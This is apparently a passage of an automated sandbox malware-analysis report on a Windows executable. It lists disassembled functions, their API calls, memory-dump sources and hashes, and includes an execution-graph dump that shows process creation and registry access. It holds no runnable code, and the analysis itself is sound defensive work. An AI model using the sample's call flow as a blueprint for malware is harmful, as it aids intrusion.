                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: ea8ea2673c922d3ebcb846e17505f6c06d83a5785aad669d9e70f31bac126ead
                            • Instruction ID: 9637c05ec2a41aa48f54f1eb1424971fd2b2fdd4f391fe8e15d7e66844227ca7
                            • Opcode Fuzzy Hash: ea8ea2673c922d3ebcb846e17505f6c06d83a5785aad669d9e70f31bac126ead
                            • Instruction Fuzzy Hash: DFE11363B39A46D5DA109F66E990AB8A3A1EF047E8F918332D93D577D8DF38D005D310
                            Function 00007FF774A03680 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: ExceptionFailFastRaise
                            • String ID: Process is terminating due to StackOverflowException.
                            • API String ID: 2546344036-2200901744
                            • Opcode ID: fe34fe60a8b53b133f424caca37e213f3d652fd43d92ea617847fbec9e1bc9e9
                            • Instruction ID: f21dc2e1734baf34c3db654ec0eec9eb37be8771a670447434f57e2106c71b01
                            • Opcode Fuzzy Hash: fe34fe60a8b53b133f424caca37e213f3d652fd43d92ea617847fbec9e1bc9e9
                            • Instruction Fuzzy Hash: AA518563E39A42D2EE50AF2BD5D5674A390EF48B84F968436D91D437B0EF2CE4558310
                            Function 00007FF774A42FB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryExW.KERNEL32(?,?,?,?,00000145BC000000,00007FF774A430AD,?,?,00000000,00007FF774A2FA9C,?,FFFFFFFF,47AE147AE147AE15,00007FF774A1964C), ref: 00007FF774A43002
                            • GetProcAddress.KERNEL32(?,?,?,?,00000145BC000000,00007FF774A430AD,?,?,00000000,00007FF774A2FA9C,?,FFFFFFFF,47AE147AE147AE15,00007FF774A1964C), ref: 00007FF774A4301C
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetEnabledXStateFeatures$kernel32.dll
                            • API String ID: 2574300362-4754247
                            • Opcode ID: 0d1bad6a7b8d3c1afb901e75ce55123fadd1554c836fe95c377a29b41be358a4
                            • Instruction ID: 8a18eef0b66b7953a6cd8bf204e634703e078b17b89e2a843507799aa680aa4a
                            • Opcode Fuzzy Hash: 0d1bad6a7b8d3c1afb901e75ce55123fadd1554c836fe95c377a29b41be358a4
                            • Instruction Fuzzy Hash: D1210553F3C152C2FFA8AB2FE591B7D92819B847D0FE5813AC90E816D4DD1DD9808720
                            Function 00007FF774A0B1D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetEnabledXStateFeatures$kernel32
                            • API String ID: 2574300362-4273408117
                            • Opcode ID: 532f177c9a3abf93edbeefab53f090ab908d42bf1be2dcd3b1f8b265f2863a08
                            • Instruction ID: 72866da2914343f037f97f8a470cc1330f163c06d1b3aea41d6d572602e8d644
                            • Opcode Fuzzy Hash: 532f177c9a3abf93edbeefab53f090ab908d42bf1be2dcd3b1f8b265f2863a08
                            • Instruction Fuzzy Hash: 27E04F16F3A602C1EF58BF6399C56746350BFA9B00FC94435C80D023A1FE2CA64AC720
                            Function 00007FF774A0B180 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: GetEnabledXStateFeatures$kernel32
                            • API String ID: 2574300362-4273408117
                            • Opcode ID: d9ff822428f1893a5703cac88901d505093234beacf457cec68585e3c479c2ba
                            • Instruction ID: 61e3143a1b982a47d3237636a5309a93296f029c9456336ae1edcf9b88be36f5
                            • Opcode Fuzzy Hash: d9ff822428f1893a5703cac88901d505093234beacf457cec68585e3c479c2ba
                            • Instruction Fuzzy Hash: 4CE01A06F3A702C1EE48BF93588567463507F88740FD84035C80D01360EE2CA64A8720
                            Function 00007FF774A3E8F0 Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            • Opcode ID: 669846d24bbda5f65c578a588012ee14f3413299c3a7e3c496bd00c502c477b6
                            • Instruction ID: 6edd36381be09bf700e0c4eab27179f73a551231a0dacb33ee77ebc5f97b6a63
                            • Opcode Fuzzy Hash: 669846d24bbda5f65c578a588012ee14f3413299c3a7e3c496bd00c502c477b6
                            • Instruction Fuzzy Hash: 3841CC33F38256C1EBA45E27C0C0A7AE290EB54F98FB68536D64E467C5EE3CE4418761
                            Function 00007FF774A21BED Relevance: 6.1, APIs: 4, Instructions: 119threadCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            • Opcode ID: ea4baac3568b8008df20d653752b465ece59447f5b54120d8eb719c92615070f
                            • Instruction ID: 8f960a331d18efa8a569a34d1c7be63c3fa9887716b7431f200f9c988e60e362
                            • Opcode Fuzzy Hash: ea4baac3568b8008df20d653752b465ece59447f5b54120d8eb719c92615070f
                            • Instruction Fuzzy Hash: BA512E36F3C203D6F2547F279DC0E75A2946F80358FA68136D41D922D5EE1DF801A632
                            Function 00007FF774A3F060 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: BreakDebug
                            • String ID:
                            • API String ID: 456121617-0
                            • Opcode ID: 21388db3ff23c23bfe290b02463c8e984ea9257b12978aae731d96e3086609a7
                            • Instruction ID: 8583be49e1033c221a52b76c78546714684af538a66fb367550acea63a7f613b
                            • Opcode Fuzzy Hash: 21388db3ff23c23bfe290b02463c8e984ea9257b12978aae731d96e3086609a7
                            • Instruction Fuzzy Hash: 1B419023A39646C1FE51AF16A180B79E7A0AF45B58FAA0435EF4C07395FF7CE8418261
                            Function 00007FF774A2D200 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: BreakDebug
                            • String ID:
                            • API String ID: 456121617-0
                            • Opcode ID: a762ba7bdb9e68b543346d8befee5f14f7d2aaaa5ecc6a7732aa10b9ae04d0ef
                            • Instruction ID: c2645fed3992870aa2d2b2ca5b595006161ddd4d87275ea95c9e9151ff904368
                            • Opcode Fuzzy Hash: a762ba7bdb9e68b543346d8befee5f14f7d2aaaa5ecc6a7732aa10b9ae04d0ef
                            • Instruction Fuzzy Hash: 3931E633A38745C1E624BF1691807B9E7A4FF85B94FAA0034DE5D1B696DF7CD4409320
                            Function 00007FF774A0AD00 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                            Download Yara Rule
                            APIs
                            • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF774A06431), ref: 00007FF774A0AD34
                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF774A06431), ref: 00007FF774A0AD3E
                            • CoWaitForMultipleHandles.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF774A06431), ref: 00007FF774A0AD5D
                            • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF774A06431), ref: 00007FF774A0AD71
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: ErrorLastMultipleWait$HandlesObjects
                            • String ID:
                            • API String ID: 2817213684-0
                            • Opcode ID: 1b63c40e6d013145cedae492ad8f21b5e2360a6dd9ad6664cb5addbe83128acf
                            • Instruction ID: 568c73474e57e4a9d5b38f5b0a9906fd2fcdcd1b296c350647c575649d3b82bc
                            • Opcode Fuzzy Hash: 1b63c40e6d013145cedae492ad8f21b5e2360a6dd9ad6664cb5addbe83128acf
                            • Instruction Fuzzy Hash: C411913263C655C2D7145F26B49453AF360FB54791FA40135EAC943BB8DF7CD8508760
                            Function 00007FF774A6A8E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF774A69A6B), ref: 00007FF774A6A930
                            • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF774A69A6B), ref: 00007FF774A6A971
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: ExceptionFileHeaderRaise
                            • String ID: csm
                            • API String ID: 2573137834-1018135373
                            • Opcode ID: aa4e29ff740041cbb66bd2c147c1e0abea6c0f4e7f03852bd6b62dcdd7bd4198
                            • Instruction ID: a07624848fcf2b4bec204d54ee4b1175c3613c8476ce201015b40f9844931828
                            • Opcode Fuzzy Hash: aa4e29ff740041cbb66bd2c147c1e0abea6c0f4e7f03852bd6b62dcdd7bd4198
                            • Instruction Fuzzy Hash: C7112133628B45C2DB619F16E440269B7E5FB89B98F694230DE8C07768DF3CD9518700
                            Function 00007FF774A31660 Relevance: 5.1, APIs: 4, Instructions: 112COMMON
                            Download Yara Rule
                            APIs
                            • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF774A1D516,?,-8000000000000000,00000001,00007FF774A2C6D6), ref: 00007FF774A316EA
                            • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF774A1D516,?,-8000000000000000,00000001,00007FF774A2C6D6), ref: 00007FF774A31759
                            • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF774A1D516,?,-8000000000000000,00000001,00007FF774A2C6D6), ref: 00007FF774A317A2
                            • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00007FF774A1D516,?,-8000000000000000,00000001,00007FF774A2C6D6), ref: 00007FF774A317B8
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: fa8dc7cbf7cf060cfb14899e70fb8a95188bcdfbfc5a069442a73c28387b65d9
                            • Instruction ID: 8f76db62591cc4365a72e3200d12b2cbe189ae1b0e4f807a7708c65d300456e2
                            • Opcode Fuzzy Hash: fa8dc7cbf7cf060cfb14899e70fb8a95188bcdfbfc5a069442a73c28387b65d9
                            • Instruction Fuzzy Hash: 37518E73A38642D1EA14AF13E8D0674E3B0FB45798FA98232DA5C03695DF3CE556C321
                            Function 00007FF774A23E10 Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                            Download Yara Rule
                            APIs
                            • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF774A23F8F,?,?,?,00007FF774A3025A), ref: 00007FF774A23E5A
                            • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF774A23F8F,?,?,?,00007FF774A3025A), ref: 00007FF774A23E9C
                            • EnterCriticalSection.KERNEL32(?,?,00000000,00007FF774A23F8F,?,?,?,00007FF774A3025A), ref: 00007FF774A23EC7
                            • LeaveCriticalSection.KERNEL32(?,?,00000000,00007FF774A23F8F,?,?,?,00007FF774A3025A), ref: 00007FF774A23EE8
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: a4be4a2250a951387a8d0b8575f6a78233bd2b07f59a0f4c7d2840ed43a5680b
                            • Instruction ID: 01fff1ba7cdb94c70f40aba56fb579a97ec8cf441ea6344d78e0c3c31dbc995e
                            • Opcode Fuzzy Hash: a4be4a2250a951387a8d0b8575f6a78233bd2b07f59a0f4c7d2840ed43a5680b
                            • Instruction Fuzzy Hash: 39212163E38906D1EA50AF26E9D03B4A2B0EF563A8FD84237C52C415E5DF3DE599C321

                            Execution Graph

                            Execution Coverage:4.1%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:4.5%
                            Total number of Nodes:1361
                            Total number of Limit Nodes:60
                            execution_graph 47261 434887 47262 434893 CallCatchBlock 47261->47262 47288 434596 47262->47288 47264 43489a 47266 4348c3 47264->47266 47586 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 47264->47586 47273 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 47266->47273 47587 444251 5 API calls TranslatorGuardHandler 47266->47587 47268 4348dc 47270 4348e2 CallCatchBlock 47268->47270 47588 4441f5 5 API calls TranslatorGuardHandler 47268->47588 47271 434962 47299 434b14 47271->47299 47273->47271 47589 4433e7 36 API calls 5 library calls 47273->47589 47281 434984 47282 43498e 47281->47282 47591 44341f 28 API calls _Atexit 47281->47591 47284 434997 47282->47284 47592 4433c2 28 API calls _Atexit 47282->47592 47593 43470d 13 API calls 2 library calls 47284->47593 47287 43499f 47287->47270 47289 43459f 47288->47289 47594 434c52 IsProcessorFeaturePresent 47289->47594 47291 4345ab 47595 438f31 10 API calls 4 library calls 47291->47595 47293 4345b0 47298 4345b4 47293->47298 47596 4440bf 47293->47596 47296 4345cb 47296->47264 47298->47264 47673 436e90 47299->47673 47302 434968 47303 4441a2 47302->47303 47675 44f059 47303->47675 47305 434971 47308 40e9c5 47305->47308 47306 4441ab 47306->47305 47679 446815 36 API calls 47306->47679 47681 41cb50 LoadLibraryA GetProcAddress 47308->47681 47310 40e9e1 GetModuleFileNameW 47686 40f3c3 47310->47686 47312 40e9fd 47701 4020f6 47312->47701 47315 4020f6 28 API calls 47316 40ea1b 47315->47316 47707 41be1b 47316->47707 47320 40ea2d 47733 401e8d 47320->47733 47322 40ea36 47323 40ea93 47322->47323 47324 40ea49 47322->47324 47739 401e65 47323->47739 48007 40fbb3 118 API calls 47324->48007 47327 40eaa3 47331 401e65 22 API calls 47327->47331 47328 40ea5b 47329 401e65 22 API calls 47328->47329 47330 40ea67 47329->47330 48008 410f37 36 API calls __EH_prolog 47330->48008 47332 40eac2 47331->47332 47744 40531e 47332->47744 47335 40ead1 47749 406383 47335->47749 47336 40ea79 48009 40fb64 78 API calls 47336->48009 47340 40ea82 48010 40f3b0 71 API calls 47340->48010 47346 401fd8 11 API calls 47348 40eefb 47346->47348 47347 401fd8 11 API calls 47349 40eafb 47347->47349 47590 4432f6 GetModuleHandleW 47348->47590 47350 401e65 22 API calls 47349->47350 47351 40eb04 47350->47351 47766 401fc0 47351->47766 47353 40eb0f 47354 401e65 22 API calls 47353->47354 47355 40eb28 47354->47355 47356 401e65 22 API calls 47355->47356 47357 40eb43 47356->47357 47358 40ebae 47357->47358 48011 406c1e 47357->48011 47359 401e65 22 API calls 47358->47359 47365 40ebbb 47359->47365 47361 40eb70 47362 401fe2 28 API calls 47361->47362 47363 40eb7c 47362->47363 47366 401fd8 11 API calls 47363->47366 47364 40ec02 47770 40d069 47364->47770 47365->47364 47371 413549 3 API calls 47365->47371 47368 40eb85 47366->47368 48016 413549 RegOpenKeyExA 47368->48016 47369 40ec08 47370 40ea8b 47369->47370 47773 41b2c3 47369->47773 47370->47346 47377 40ebe6 47371->47377 47375 40f34f 48099 4139a9 30 API calls 47375->48099 47376 40ec23 47378 40ec76 47376->47378 47790 407716 47376->47790 47377->47364 48019 4139a9 30 API calls 47377->48019 47380 401e65 22 API calls 47378->47380 47383 40ec7f 47380->47383 47392 40ec90 47383->47392 47393 40ec8b 47383->47393 47385 40f365 48100 412475 65 API calls ___scrt_fastfail 47385->48100 47386 40ec42 48020 407738 30 API calls 47386->48020 47387 40ec4c 47390 401e65 22 API calls 47387->47390 47402 40ec55 47390->47402 47391 40f36f 47395 41bc5e 28 API calls 47391->47395 47398 401e65 22 API calls 47392->47398 48023 407755 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 47393->48023 47394 40ec47 48021 407260 98 API calls 47394->48021 47399 40f37f 47395->47399 47400 40ec99 47398->47400 47899 413a23 RegOpenKeyExW 47399->47899 47794 41bc5e 47400->47794 47402->47378 47406 40ec71 47402->47406 47403 40eca4 47798 401f13 47403->47798 48022 407260 98 API calls 47406->48022 47410 401f09 11 API calls 47411 40f39c 47410->47411 47413 401f09 11 API calls 47411->47413 47415 40f3a5 47413->47415 47902 40dd42 47415->47902 47416 401e65 22 API calls 47417 40ecc1 47416->47417 47421 401e65 22 API calls 47417->47421 47423 40ecdb 47421->47423 47422 40f3af 47424 401e65 22 API calls 47423->47424 47425 40ecf5 47424->47425 47426 401e65 22 API calls 47425->47426 47427 40ed0e 47426->47427 47428 401e65 22 API calls 47427->47428 47459 40ed7b 47427->47459 47434 40ed23 _wcslen 47428->47434 47429 40ed8a 47430 40ed93 47429->47430 47458 40ee0f ___scrt_fastfail 47429->47458 47431 401e65 22 API calls 47430->47431 47432 40ed9c 47431->47432 47435 401e65 22 API calls 47432->47435 47433 40ef06 ___scrt_fastfail 